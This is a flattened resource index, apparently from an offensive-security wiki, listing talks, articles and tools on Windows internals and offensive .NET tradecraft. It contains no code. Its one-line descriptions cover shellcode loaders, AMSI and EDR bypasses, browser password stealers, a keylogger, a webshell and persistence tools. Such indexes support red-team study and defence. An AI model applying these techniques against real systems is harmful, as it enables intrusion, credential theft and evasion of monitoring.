- Articles/Blogposts/Writeups
-
Talks/Presentations/Videos
-
Windows Notification Facility: Peeling the Onion of the Most Undocumented Kernel Attack Surface Yet - Alex Ionescu, Gabrielle Viala
- Slides
- All Windows researchers know about RPC and ALPC, and the attack surface provided through the kernel's system call layer. As they know about shared memory, the object manager, the registry, and countless other more 'creative' kernel mechanisms which allow cross-process data sharing and communication, such as raw ETW or atom tables.
-
Windows Notification Facility: Peeling the Onion of the Most Undocumented Kernel Attack Surface Yet - Alex Ionescu, Gabrielle Viala
-
Tools
-
wnfun
- WNF Utilities 4 Newbies (WNFUN) is the repository for the Python scripts and C tools that Gabrielle Viala (@pwissenlit) and Alex Ionescu (@aionescu) wrote for their BlackHat 2018 presentation on the Windows Notification Facility.
-
wnfun
-
Windows Remote Management
-
101
- Windows Remote Management - Wikipedia
-
Windows Remote Management - docs.ms
- Windows Remote Management (WinRM) is the Microsoft implementation of WS-Management Protocol, a standard Simple Object Access Protocol (SOAP)-based, firewall-friendly protocol that allows hardware and operating systems, from different vendors, to interoperate. The WS-Management protocol specification provides a common way for systems to access and exchange management information across an IT infrastructure. WinRM and Intelligent Platform Management Interface (IPMI), along with the Event Collector are components of the Windows Hardware Management features.
- Installation and configuration for Windows Remote Management - docs.ms
- winrs - docs.ms
-
Articles/Blogposts/Writeups
- WinRM is my Remote Access Tool - Raphael Mudge(2015)
- Lateral Movement – WinRM - Pentestlab.blog(2018)
- Group Policies: Enabling WinRM for Windows Client Operating Systems (Windows 10, Windows 8, Windows 7) - Patrick Gruenauer(2018)
- Hacking Windows Remote Management (WinRM) - Securethelogs(2019)
- WinRM - JPCert
- WinRM Penetration Testing - Raj Chandel(2020)
- Evil-Winrm : Winrm Pentesting Framework - Raj Chandel(2020)
- Talks/Presentations/Videos
-
Tools
-
WinRb/WinRM
- Ruby library for Windows Remote Management
-
WinRb/WinRM
-
101
-
Windows Sandbox
- 101
- Articles/Blogposts/Writeups
-
Windows Scripting Host
-
101
- Windows Scripting Host - Wikipedia
-
Windows Script Host - docs.ms
- The following sections provide information about Windows Script Host along with a reference section that documents the object model.
-
wscript - docs.ms
- Windows Script Host provides an environment in which users can execute scripts in a variety of languages that use a variety of object models to perform tasks.
-
Scripting - docs.ms
- Windows Script is a comprehensive scripting infrastructure for the Microsoft® Windows® platform. Windows Script provides two script engines, Visual Basic® Scripting Edition and Microsoft JScript®, which can be embedded into Windows Applications. It also provides an extensive array of supporting technologies that makes it easier for script users to script Windows applications.
- Articles/Blogposts/Writeups
-
101
-
Malicious Butler
-
The Remote Malicious Butler Did It! - Tal Be'ery, Chaim Hoch(BHUSA 2015)
- An Evil Maid attack is a security exploit that targets a computing device that has been left unattended. An evil maid attack is characterized by the attacker's ability to physically access the target multiple times without the owner's knowledge. On BlackHat Europe 2015, Ian Haken in his talk "Bypassing Local Windows Authentication to Defeat Full Disk Encryption" had demonstrated a smart Evil Maid attack which allows the attacker to bypass Bitlocker disk encryption in an enterprise's domain environment. The attacker can do so by connecting the unattended computer into a rogue Domain Controller and abusing a client side authentication vulnerability. As a result, Microsoft had released a patch to fix this vulnerability and mitigate the attack. While being a clever attack, the physical access requirement for the attack seems to be prohibitive and would prevent it from being used on most APT campaigns. As a result, defenders might not correctly prioritize the importance of patching it. In our talk, we reveal the "Remote Malicious Butler" attack, which shows how attackers can perform such an attack, remotely, to take a complete control over the remote computer. We will dive into the technical details of the attack including the rogue Domain Controller, the client-side vulnerability and the Kerberos authentication protocol network traffic that ties them. We would explore some other attack avenues, all leveraging on the rogue Domain Controller concept. We would conclude with the analysis of some practical generic detection and prevention methods against rogue Domain Controllers.
- Slides
-
The Remote Malicious Butler Did It! - Tal Be'ery, Chaim Hoch(BHUSA 2015)
C# & .NET Stuff
-
101
-
.NET & .NET Core
-
101
- Overview of .NET Framework - docs.ms
- Introduction to .NET Core - docs.ms
- .NET Core CLI overview - docs.ms
- .NET Standard - docs.ms
-
Tour of .NET - docs.ms
- This article offers a guided tour through some of the key features of the .NET.
-
.NET architectural components - docs.ms
- A .NET app is developed for and runs in one or more implementations of .NET. Implementations of .NET include the .NET Framework, .NET Core, and Mono. There is an API specification common to all implementations of .NET that's called the .NET Standard. This article gives a brief introduction to each of these concepts.
- Common Language Runtime (CLR) overview - docs.ms
-
Application Domains
-
AppDomain Class - docs.ms
- Represents an application domain, which is an isolated environment where applications execute. This class cannot be inherited.
-
AppDomain Class - docs.ms
-
Internals
- Ninja Patching .NET - Jon McCoy(Dojocon2010)
- Hacking .NET Applications at Runtime: A Dynamic Attack - Jon McCoy(Defcon18)
-
Attacking .Net at Runtime - Jonathan McCoy(2013)
- This paper will introduce methodology forattacking .NET programs at runtime. Thisattack will grant control over the targetsvariables, core logic, and the GUI. Thisattack is implemented with .NET code,and is heavily based on reflection.
- .NET Method Internals - Common Intermediate Language (CIL) Basics - @mattifestation(2014)
-
Acquiring .NET Objects from the Managed Heap - Topher Timzen(2015)
- This paper will describe how to use any instantiated objectin the .NET CLR managed heap as if it were declared locally.It will be shown that by referencing object pointers fromthe managed heap, an attacker control objects being used inan application. Reflective techniques will be discussed and asignature will be introduced to find any object on the managedheap
-
Attacking Microsoft’s .NET Framework Through CLR - Yu Hong, Shikang Xing(HITB2018AMS)
- In this talk, we first introduce managed execution environment and managed code under .NET Framework and discuss the security weaknesses of this code execution method . After that, we show a exploit for SQL Server through CLR and our automated tools for this exploitation. We will introduce a backdoor with administrator privilege based on CLR hijacking arbitrary .NET Applications.
- .NET Malware Threat: Internals and Reversing - Alexandre Borges(Defcon2019)
-
Hijacking .NET to Defend PowerShell - Amanda Rosseau
- Abstract—With the rise of attacks using PowerShell in the recent months, there has not been a comprehensive solution for monitoring or prevention. Microsoft recently released the AMSI solution for PowerShell v5, however this can also be bypassed. This paper focuses on repurposing various stealthy runtime .NET hijacking techniques implemented for PowerShell attacks for defensive monitoring of PowerShell. It begins with a brief introduction to .NET and PowerShell, followed by a deeper explanation of various attacker techniques, which is explained from the perspective of the defender, including assembly modification, class and method injection, compiler profiling, and C based function hooking. Of the four attacker techniques that are repurposed for defensive real-time monitoring of PowerShell execution, intermediate language binary modification, JIT hooking, and machine code manipulation provide the best results for stealthy run-time interfaces for PowerShell scripting analysis
-
Managed vs Unmanaged code
-
What is "managed code"? - docs.ms
- When working with .NET Framework, you will often encounter the term "managed code". This document will explain what this term means and additional information around it.
-
What is "managed code"? - docs.ms
-
Papers
-
Reflection’s Hidden Power: “Modifying Programs at Run-Time”
- This paper will demonstrate using Reflection to take control over a DotNet (.Net)compiled code. The focus of this paper will be on how to use Reflection to navigate and gainaccess to values and functionality that would normally be off limits. This paper will be gearedfor any DotNet programmer (focus will be in C#). No special knowledge of Reflection isnecessary. The basic concept of Reflection and DotNet will be given, along with some lighttraining on using reflection. This paper is written for the DotNet v2.0 and v3.5 versions ofDotNet. Examples will be given on attacks, like forcing a program to change values and executefunctionality
-
ASM in .NET: The old is new again - Jon McCoy(2015)
- This paper will cover running raw Machine Code(ASM) from within .NET. As we all know .NET runson IL(Intermediate Language) also known as “Managed byte code”. A program can declare an unsafesection of code and drop out from the managed area to run something like unmanaged C++ or the like.This paper will show how to run raw/unmanaged ASM in a normal safe C# application.
-
Reflection’s Hidden Power: “Modifying Programs at Run-Time”
-
101
-
C#
-
101
-
A tour of the C# language - docs.ms
- C# (pronounced "See Sharp") is a modern, object-oriented, and type-safe programming language. C# has its roots in the C family of languages and will be immediately familiar to C, C++, Java, and JavaScript programmers. This tour provides an overview of the major components of the language in C# 8 and earlier.
-
A tour of the C# language - docs.ms
-
Learning
- Get started with C# - docs.ms
-
Inside a C# program - docs.ms
- The section discusses the general structure of a C# program, and includes the standard "Hello, World!" example.
- C# 101 - Channel9 MSDN
- Reflection
-
Scripting/ClearScript
-
ClearScript
- A library for adding scripting to .NET applications. Supports V8 (Windows, Linux, macOS) and JScript/VBScript (Windows).
- ClearScript FAQtorial
- Cutting Edge : A Look at ClearScript - Dino Esposito(2014 docs.ms)
-
ClearScript
-
101
-
Detection
- Interesting DFIR traces of .NET CLR Usage Logs - MenaSec(2019)
-
Hijacking .NET to Defend PowerShell - Amanda Rosseau
- Abstract—With the rise of attacks using PowerShell in the recent months, there has not been a comprehensive solution for monitoring or prevention. Microsoft recently released the AMSI solution for PowerShell v5, however this can also be bypassed. This paper focuses on repurposing various stealthy runtime .NET hijacking techniques implemented for PowerShell attacks for defensive monitoring of PowerShell. It begins with a brief introduction to .NET and PowerShell, followed by a deeper explanation of various attacker techniques, which is explained from the perspective of the defender, including assembly modification, class and method injection, compiler profiling, and C based function hooking. Of the four attacker techniques that are repurposed for defensive real-time monitoring of PowerShell execution, intermediate language binary modification, JIT hooking, and machine code manipulation provide the best results for stealthy run-time interfaces for PowerShell scripting analysis
- Informational
-
.NET & .NET Core
- Training
-
Discovery
-
Clipboard
-
Clippi-B
- Steals clipboard data written in c#, executable by cobalt-strike or any other unmanaged CLR loader. you'll need costura.fody NuGet package to compile. Targets .NET 4.0 or above, but is potentially backwards compatible with 3.5 if you use an older costura fody NuGet (untested)
-
Clippi-B
-
ActiveDirectory
-
Recon-AD
- As a proof of concept, we[OutflankNL] developed an C/C++ Active Directory reconnaissance tool based on ADSI and reflective DLLs which can be used within Cobalt Strike. The tool is called “Recon-AD” and at this moment consist of seven Reflective DLLs and a corresponding aggressor script. This tool should help you moving away from PowerShell and .NET when enumerating Active Directory and help you stay under the radar from the latest monitoring and defense technologies being applied within modern environments.
- SharpView
-
Recon-AD
-
Browser
-
SharpChromium
- SharpChromium is a .NET 4.0+ CLR project to retrieve data from Google Chrome, Microsoft Edge, and Microsoft Edge Beta.
-
SharpChromium
-
File Discovery/Hunting
-
SharpShares
- Enumerate all network shares in the current domain. Also, can resolve names to IP addresses.
-
SauronEye
- Search tool to find specific files containing specific words, i.e. files containing passwords..
- SharpFiles
-
SharpFinder
- Searches for files matching specific criteria on readable shares within the domain.
-
SharpShares
-
Network Services
-
SharpSSDP
- SSDP Service Discovery
-
SharpSSDP
-
Printers
-
SharpPrinter
- Printer is a modified and console version of ListNetworks
-
SharpPrinter
-
Screenshots
-
ScreenShooter
- C# program to take a full size screenshot of the window. Takes in 0 or 1 flag for a filename.
- Blogpost
-
ScreenShooter
-
Services
-
AtYourService
- C# .NET Assembly and python script for Service Enumeration. Queries all services on a host and filters out services running as LocalSystem, NT Authority\LocalService, and NT Authority\NetworkService
-
AtYourService
-
Situational Awarness
-
Reconerator
- This is a custom .NET assembly which will perform a number of situational awareness activities.
-
Scout
- Scout is a .NET assembly used to perform recon on hosts during a pentest. Specifically, this was created as a way to check a host before laterally moving to it.
-
SitRep
- SitRep is intended to provide a lightweight, extensible host triage alternative. Checks are loaded dynamically at runtime from stand-alone files. This allows operators to quickly modify existing checks, or add new checks as required.
-
SharpAppLocker
- C# port of the Get-AppLockerPolicy PS cmdlet
-
Seatbelt
- Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
-
HastySeries
- A C# toolset to support offensive operators to triage, asses and make intelligent able decisions. Provided operators access to toolsets that can be integrated into other projects and workflow throughout a Red Team, Pentest or host investigation. We built this toolset over a period of a few days, hence the tool prefix of "Hasty".
-
Reconerator
-
User-Hunting
-
SharpSniper
- Find specific users in active directory via their username and logon IP address
-
SharpSniper
-
Web
-
SharpWitness
- SharpWitness is my attempt at cobbling together a C# version of EyeWitness by Christopher Truncer. It still barely functions right now, but will hopefully become more useful once I put some dev time into it.
-
SharpFruit
- A C# penetration testing tool to discover low-haning web fruit via web requests.
-
SharpShot
- Capture screenshots from .NET, using either native Windows APIs or .NET methods. Screenshots can be saved to disk using a randomly generated file name, or output to the console in base64 encoded form (does not touch disk).
-
SharpWitness
-
Clipboard
-
Execution Tactics/Techniques
- 101
-
Articles/Blogposts/Writeups
- Create a Trimmed Self-Contained Single Executable in .NET Core 3.0 - talkingdotnet.com
- The 68 things the CLR does before executing a single line of your code - mattwarren.org
-
SharpNado - Teaching an old dog evil tricks using .NET Remoting or WCF to host smarter and dynamic payloads - redxorblue
- SharpNado is proof of concept tool that demonstrates how one could use .Net Remoting or Windows Communication Foundation (WCF) to host smarter and dynamic .NET payloads. SharpNado is not meant to be a full functioning, robust, payload delivery system nor is it anything groundbreaking. It's merely something to get the creative juices flowing on how one could use these technologies or others to create dynamic and hopefully smarter payloads. I have provided a few simple examples of how this could be used to either dynamically execute base64 assemblies in memory or dynamically compile source code and execute it in memory. This, however, could be expanded upon to include different kinds of stagers, payloads, protocols, etc.
- Detecting and Advancing In-Memory .NET Tradecraft - Dominic Chell(2020)
-
Talks/Presentations/Videos
-
.NET Manifesto - Win Friends and Influence the Loader - Casey Smith(Derbycon2019)
- Everything you never wanted to know about .NET manifests and influencing binary loading. A growing number of security tools, both offensive and defensive rely on the .NET Framework. This talk will focus on a narrow but important aspect. We will cover Application and Machine configuration files, as well as Registration-Free and Side-By-Side Assembly loading. What do all these have in common?Manifests. XML manifest can influence how the Operating System locates and executes binaries. We will explore additional concepts around influencing assembly loads. This talk will provide excellent insight into how these mechanisms work. How they can be subverted, and how they can be instrumented to aid defenders.
-
Staying # & Bringing Covert Injection Tradecraft to .NET - The Wover, Ruben Boonen(BlueHat IL 2020)
- As .NET has taken over as the preferred platform for development on Windows, many attackers have chosen to take advantage of its features for post-exploitation tradecraft. Legitimate APIs can be leveraged for nearly every imaginable task, managed code can be loaded and executed from memory with extraordinary ease, and scalable monitoring for suspicious usage of .NET APIs is a problem yet to be solved. However, offensive .NET tools are still hindered by a fundamental weakness: the inability to leverage unmanaged code (such as the Win32/NT APIs) safe from observation by EDR. Managed code must eventually invoke unmanaged code in order to interface with the operating system. It is here that the attacker may be caught in the hooks of any system keen on watching for fundamentally malicious behavior. To expose the depth of tradecraft still unexplored in .NET and highlight the fragility of many existing detections, we will detail the tools we have built for evading these hooks. All of our efforts have been integrated into SharpSploit, a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers. Over the past few months we have added numerous new tools and techniques for loading and executing unmanaged code safely from .NET. Unmanaged APIs may be safely accessed and modules loaded either from memory or from disk in the new DInvoke API, a dynamic replacement for .NET's PInvoke API. It also includes manual mapping, a generic syscall wrapper, a new technique we call Module Overloading, and more. Additionally, we have added a modular process injection API that allows tool developers to build their own injection technique. Simply select an allocation and injection primitive, pass in any options, and execute the result with your preferred payload. This exposes all possible design decisions to the user, and allows for easy adaptation when existing tools fail. In our talk we will focus on explaining the fundamental tradecraft behind these new developments, the challenges and requirements associated with them, and how they can be adapted to suit your needs. Additionally, we will discuss how SharpSploit can be combined with other open-source projects to be integrated into a red team's tooling. As much as possible, we will also discuss how to counter and detect the techniques that we have developed. Finally, we will explain the community-focused development of these projects and how you too can contribute to advance open-source .NET tradecraft
-
.NET Manifesto - Win Friends and Influence the Loader - Casey Smith(Derbycon2019)
- Papers
-
Tools
-
SharpGen
- SharpGen is a .NET Core console application that utilizes the Rosyln C# compiler to quickly cross-compile .NET Framework console applications or libraries.
-
SharpCompile
- SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing using beacon's 'execute-assembly' in seconds.
-
NetLoader
- Loads any C# binary from filepath or url, patching AMSI and bypassing Windows Defender on runtime
-
AppDomainExample
- A .NET tool that uses AppDomain's to enable dynamic execution and escape detection.
-
SharpAttack
- SharpAttack is a console for certain things I use often during security assessments. It leverages .NET and the Windows API to perform its work. It contains commands for domain enumeration, code execution, and other fun things.
-
PowerSharpPack
- Many usefull offensive CSharp Projects wraped into Powershell for easy usage.
-
peloader.cs
- This scripts loads a base64 encoded x64 PE file (eg: Mimikatz or a Meterpreter) into memory and reflectively executes it.
-
RunSharp
- Simple program that allows you to run commands as another user without being prompted for their password. This is useful in cases where you don't always get feedback from a prompt, such as the case with some remote shells.
-
GrayFrost
- GrayFrost is a C++ DLL delivery system for C# payloads. Once compiled, GrayFrost can be injected into .NET applications using any DLL injection technique you wish!
-
SharpGen
-
Adversary Simulation
-
PurpleSharp
- PurpleSharp is a C# adversary simulation tool that executes adversary techniques with the purpose of generating attack telemetry in monitored Windows environments
-
PurpleSharp
-
Assemblies & AppDomains
-
101
-
Assemblies in .NET - docs.ms
- Assemblies form the fundamental units of deployment, version control, reuse, activation scoping, and security permissions for .NET-based applications. An assembly is a collection of types and resources that are built to work together and form a logical unit of functionality. Assemblies take the form of executable (.exe) or dynamic link library (.dll) files, and are the building blocks of .NET applications. They provide the common language runtime with the information it needs to be aware of type implementations.
- Strong-named assemblies - docs.ms
- Global Assembly Cache - docs.ms
- Working with Assemblies and the Global Assembly Cache - docs.ms
-
Application Domains and Assemblies How-to Topics - docs.ms
- The following sections contain links to all How-to topics found in the conceptual documentation for programming with application domains and assemblies.
-
Assemblies in .NET - docs.ms
-
Articles/Blogposts/Writeups
- Mixed Assemblies - Crafting Flexible C++ Reflective Stagers for .NET Assemblies - TheWover
- Linking dependencies together in C# - Jean Maes(2020)
- Jeffrey Richter: Excerpt #2 from CLR via C#, Third Edition - docs.ms
- .Net over .net – Breaking the Boundaries of the .Net Framework - Jim Shaver(2018)
- Shellcode: Loading .NET Assemblies From Memory(2019)
- Tools
-
Execution of
-
Articles/Blogposts/Writeups
-
RunDLL32 your .NET (AKA DLL exports from .NET) - Adam Chester
- In this post I wanted to look at a technique which is by no means new to .NET developers, but may prove useful to redteamers crafting their tools... exporting .NET static methods within a DLL... AKA using RunDLL32 to launch your .NET assembly.
- Running a .NET Assembly in Memory with Meterpreter - Thomas Hendrickson
- Shellcode: Loading .NET Assemblies From Memory - modexp
-
RunDLL32 your .NET (AKA DLL exports from .NET) - Adam Chester
- Tools
-
DotNetToJScript
-
Articles/Blogposts/Writeups
- Executing C# Assemblies from Jscript and wscript with DotNetToJscript - @spottheplanet
- Advanced TTPs – DotNetToJScript (Part 1) - Jerry Odegaard(2020)
- Advanced TTPs – DotNetToJScript – Part 3 - Jerry Odegaard(2020)
- CSharp, DotNetToJScript, XSL - RastaMouse
- Extracting DotNetToJScript’s PE Files - Didier Stevens(2018)
-
Tools
-
DotNetToJScript
- This file is part of DotNetToJScript - A tool to generate a JScript which bootstraps an arbitrary .NET Assembly and class.
-
DotNetToJScript
-
Articles/Blogposts/Writeups
-
Inject-as-Shellcode
- Articles/Blogposts/Writeups
-
Tools
-
CLRVoyance
- CLRvoyance is a shellcode kit that supports bootstrapping managed assemblies into unmanaged (or managed) processes. It provides three different implementations of position independent shellcode for CLR hosting, as well as a generator script for quickly embedding a managed assembly in position independent shellcode.
-
Donut
- Generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters
-
CLRVoyance
-
From Native Code
-
Tools
-
CLRHosting
- Library for reflectively loading .NET Assemblies using only the unmanaged CLR Hosting APIs provided by mscoree.dll. This imitates how the Windows Loader loads .NET EXEs and DLLS. This is the most OpSec friendly way to load Assemblies, since it is bootstrapped by an unmanaged executable (and is therefore harder to reverse) and does not use any .NET Framework libraries (such as System.Reflection). Because the result is an unmanaged PE-formatted EXE or DLL, the result may be injected into processes using standard process injection techniques. Therefore, managed Assemblies may be injected into unmanaged processes. Additionally, unmanaged on-disk stagers (written in C/C++) may be built that load .NET payloads (written in C#, etc.).
-
DotNetReflectiveLoading
- This project is the culmination of playing around with the native application CLR hosting APIs. It provides the ability to reflectively load and execute code from .NET assemblies, and will be a bit of an exploration of the COM and reflection facilities underpinning .NET on Windows.
-
AssemblyLoader
- Loads .NET Assembly Via CLR Loader
-
Donut
- "Donut contains a CLR Host loader that is converted to shellcode"
-
CLRHosting
-
Tools
-
Articles/Blogposts/Writeups
-
101
-
Binary/Source Obfuscation
-
AsStrongAsFuck
- A console obfuscator for .NET assemblies.
-
ConfuserEx2
- ConfuserEx 2 is a open-source protector for .NET applications. It is the successor of Confuser project and the ConfuserEx project.
-
NeoConfuserEx
- Neo ConfuserEx is the successor of ConfuserEx project, an open source C# obfuscator which uses its own fork of dnlib for assembly manipulation. Neo ConfuserEx handles most of the dotnet app, supports all elligible .NET Frameworks and provide decent obfuscation on your file.
- .NET Obfuscator Lists
- Lists of .NET Deobfuscator / Unpacker (Open Source)
-
MindLated
- .net obfuscator
-
AsStrongAsFuck
-
Cradles/Runners
-
SharpCradle
- SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.
-
RunShellcode
- Simple GUI program when you just want to run some shellcode.
-
CreateThread Example
- C# code to use CreateThread to run position independent code in the running process. This code is provided AS IS, and will not be supported.
-
CSharp SetThreadContext
- C# Shellcode Runner to execute shellcode via CreateRemoteThread and SetThreadContext to evade Get-InjectedThread
-
SharpCradle
-
Language Embeds
-
Tools
-
Zolom
- C# Executable with embedded Python that can be used reflectively to run python code on systems without Python installed
-
Zolom
-
Tools
- MSBuild-related
-
MS-SQL-related
-
Attacking SQL Server CLR Assemblies - Scott Sutherland
- During this webinar we’ll review how to create, import, export, and modify CLR assemblies in SQL Server with the goal of privilege escalation, OS command execution, and persistence. Scott will also share a few PowerUpSQL functions that can be used to execute the CLR attacks on a larger scale in Active Directory environments.
-
Attacking SQL Server CLR Assemblies - Scott Sutherland
-
Process Injection/Shellcode Execution
- Articles/Blogposts/Writeups
-
Tools
-
C# Memory Injection Examples
- A set of scripts that demonstrate how to perform memory injection.
-
Execute assembly via Meterpreter session
- Custom Metasploit post module to executing a .NET Assembly from Meterpreter session
-
TikiTorch
- TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process, allocates a region of memory, then uses CreateRemoteThread to run the desired shellcode within that target process. Both the process and shellcode are specified by the user.
- TikiTorch - Rastamouse
- TikiVader - Rastamouse
- The Return of Aggressor - Rastamouse
- TikiService - Rastamouse
- Lighting the path through EDRs using TikiTorch - RhythmStick(2019)
-
MemorySharp
- MemorySharp is a C# based memory editing library targeting Windows applications, offering various functions to extract and inject data and codes into remote processes to allow interoperability.
-
ManagedInjection
- A proof of concept for dynamically loading .net assemblies at runtime with only a minimal convention pre-knowledge
-
SharpNeedle
- A project for properly injecting C# dlls into other processes.
-
ManagedInjection
- A proof of concept for injecting a pre-compiled .net assembly in memory at runtime with zero pre-knowledge of its assembly namespace or type. All that is necessary is a convention for the initial method name which will be instantiated, or just have the assembly initialize via its Constructor for a true "zero knowledge" scenario.
-
C# Memory Injection Examples
-
PS in C#
-
Articles/Blogposts/Writeups
-
Executing PowerShell scripts from C# - doc.ms(2014)
- "In today’s post, I will demonstrate the basics of how to execute PowerShell scripts and code from within a C#/.NET applications. I will walk through how to setup your project prerequisites, populate the pipeline with script code and parameters, perform synchronous and asynchronous execution, capture output, and leverage shared namespaces."
- Using C# for post-PowerShell attacks - John Bergbom(2018)
-
Executing PowerShell scripts from C# - doc.ms(2014)
-
Tools
-
NoPowerShell
- NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used; only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll,main.
-
p0wnedShell
- PowerShell Runspace Post Exploitation Toolkit
- p0wnedLoader
-
Smallp0wnedShell
- Small modification version of PowerShell Runspace Post Exploitation Toolkit (p0wnedShell)
- CScriptShell
-
Stracciatella
- OpSec-safe Powershell runspace from within C# (aka SharpPick) with AMSI, CLM and Script Block Logging disabled at startup
-
SpaceRunner
- This tool enables the compilation of a C# program that will execute arbitrary PowerShell code, without launching PowerShell processes through the use of runspace.
-
NoPowerShell
-
Articles/Blogposts/Writeups
-
Reflection
-
Reflection (C#) - docs.ms
- Reflection provides objects (of type Type) that describe assemblies, modules, and types. You can use reflection to dynamically create an instance of a type, bind the type to an existing object, or get the type from an existing object and invoke its methods or access its fields and properties. If you are using attributes in your code, reflection enables you to access them. For more information, see Attributes.
- How C# Reflection Works With Code Examples - stackify
- Reflection in .NET - keesari_anjaiah(2010)
- What is Reflection in C#? - geeksforgeeks(2019)
-
Reflection (C#) - docs.ms
-
Resource Embedding
Single File Executable - https://docs.microsoft.com/en-us/dotnet/core/whats-new/dotnet-core-3-0#single-file-executables
Assembly Linking - https://docs.microsoft.com/en-us/dotnet/core/whats-new/dotnet-core-3-0#assembly-linking
https://denhamcoder.net/2018/08/25/embedding-net-assemblies-inside-net-assemblies/
-
Fody
- The Home repository is the starting point for people to learn about Fody, the project.
-
Fody Engine
- Extensible tool for weaving .net assemblies. Manipulating the IL of an assembly as part of a build requires a significant amount of plumbing code. This plumbing code involves knowledge of both the MSBuild and Visual Studio APIs. Fody attempts to eliminate that plumbing code through an extensible add-in model.
-
Costura
- Embed references as resources
-
Fody
-
Serialization
-
Gadget2Jscript
- GadgetToJScript - RastaMouse(2020)
- GadgetToJScript - 3gstudent
-
GadgetToJScript
- A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS based scripts. The gadget being used triggers a call to Assembly.Load when deserialized via jscript/vbscript, this means it can be used in the same way to trigger in-memory load of your own shellcode loader at runtime. Lastly, the tool was created mainly for automating WSH scripts weaponization for RT engagements (LT, Persistence, Initial Compromise), the shellcode loader which was used for PoC is removed and replaced by an example assembly implemented in the "TestAssemblyLoader.cs" class for PoC purpose.
- GadgetToJScript, Covenant, Donut - 3xpl01tc0d3r
-
Tools
-
DotNetDeserializationScanner
- Scans for .NET Deserialization Bugs in .NET Assemblies
-
DotNetDeserializationScanner
-
Gadget2Jscript
-
Windows Services
- Using Parameters With InstallUtil - ip3lee
-
SharpSC
- Simple .NET assembly to interact with services.
-
WinAPI Access
-
Articles/Blogposts/Writeups
- Offensive P/Invoke: Leveraging the Win32 API from Managed Code - Matt Hand
- Red Team Tactics: Utilizing Syscalls in C# - Prerequisite Knowledge - Jack Halon(2020)
- Red Team Tactics: Utilizing Syscalls in C# - Prerequisite Knowledge - Jack Halon
- Red Team Tactics: Utilizing Syscalls in C# - Writing The Code - Jack Halon
- SharpSploit.Execution.DynamicInvoke
-
Tools
- SysCallTables
-
ManagedWindows
- Managed wrappers around the Windows API and some Native API
-
SharpCall
- Simple proof of concept code that allows you to execute direct system calls in C# by utilizing unmanaged code to bypass EDR and API Hooking.
-
taskkill
- This is a reference example for how to call the Windows API to enumerate and kill a process similar to taskkill.exe. This is based on (incomplete) MSDN example code. Proof of concept or pattern only.
-
DnsCache
- This is a reference example for how to call the Windows API to enumerate cached DNS records in the Windows resolver. Proof of concept or pattern only.
-
Articles/Blogposts/Writeups
-
Payloads
-
SharPyShell
- tiny and obfuscated ASP.NET webshell for C# web applications
-
TCPRelayInjecter2
- Tool for injecting a "TCP Relay" managed assembly into an unmanaged process
-
Salsa Tools
- Salsa Tools is a collection of three different tools that combined, allows you to get a reverse shell on steroids in any Windows environment without even needing PowerShell for it's execution. In order to avoid the latest detection techniques (AMSI), most of the components were initially written on C#. Salsa Tools was publicly released by Luis Vacas during his Talk “Inmersión en la explotación tiene rima” which took place during h-c0n in 9th February 2019.
-
CasperStager
- PoC for persisting .NET payloads in Windows Notification Facility (WNF) state names using low-level Windows Kernel API calls.
-
SharPyShell
-
Privilege Escalation
-
SharpExchangePriv
- A C# implementation of PrivExchange by
@_dirkjan
. Kudos to @g0ldenGunSec, as I relied on his code.
- A C# implementation of PrivExchange by
-
SharpUp
- SharpUp is a C# port of various PowerUp functionality. Currently, only the most common checks have been ported; no weaponization functions have yet been implemented.
-
Watson
- Enumerate missing KBs and suggest exploits for useful Privilege Escalation vulnerabilities
-
Net-GPPPassword
- .NET/C# implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
-
SharpExchangePriv
-
Collection
-
Sharp-Profit
- "Sharp-Profit is a C# version of my Profit script. This version can be utilized with Cobalt Strike's execute-assembly function."
-
Browser
-
FirePwd.Net
- FirePwd.Net is an open source tool wrote in C# to decrypt Mozilla stored password.
-
SharpWeb
- SharpWeb is a .NET 2.0 CLR compliant project that can retrieve saved logins from Google Chrome, Firefox, Internet Explorer and Microsoft Edge. In the future, this project will be expanded upon to retrieve Cookies and History items from these browsers.
-
FirePwd.Net
-
File-Hunting
-
SharpSearch
- Search files for extensions as well as text within.
-
SharpSearch
-
Monitoring
-
WireTap
- .NET 4.0 Project to interact with video, audio and keyboard hardware.
-
SharpLogger
- Keylogger written in C#
-
WireTap
-
Sharp-Profit
-
Privilege Escalation
-
Active Directory
-
Grouper2
- Find vulnerabilities in AD Group Policy
-
Grouper2
-
Registry
-
Reg1c1de: Windows Registry Privesc Scanner
- Reg1c1de is a tool that scans specified registry hives and reports on any keys where the user has write permissions In addition, if any registry values are found that contain file paths with certain file extensions and they are writeable, these will be reported as well.
- Blogpost
-
Reg1c1de: Windows Registry Privesc Scanner
-
Services
-
SneakyService
- A simple C# windows service implementation that can be used to demonstrate privilege escalation from misconfigured windows services.
-
SneakyService
-
Active Directory
-
Persistence
- Scheduled Tasks
-
General
-
SharpStay
- .NET project for installing Persistence
-
SharpHide
- Technique Whitepaper
- Just a nice persistence trick to confuse DFIR investigation. Uses NtSetValueKey native API to create a hidden (null terminated) registry key. This works by adding a null byte in front of the UNICODE_STRING key valuename.
-
SharpStay
-
Golden Tickets
-
GoldenTicket
- This .NET assembly is specifically designed for creating Golden Tickets. It has been built with a custom version of SharpSploit and an old 2.0 alpha (x64) version of Powerkatz.
-
GoldenTicket
-
Registry-related
-
Reg_Built
- C# Userland Registry RunKey persistence
-
Reg_Built
-
Scheduled Tasks
- Articles/Blogposts/Writeups
-
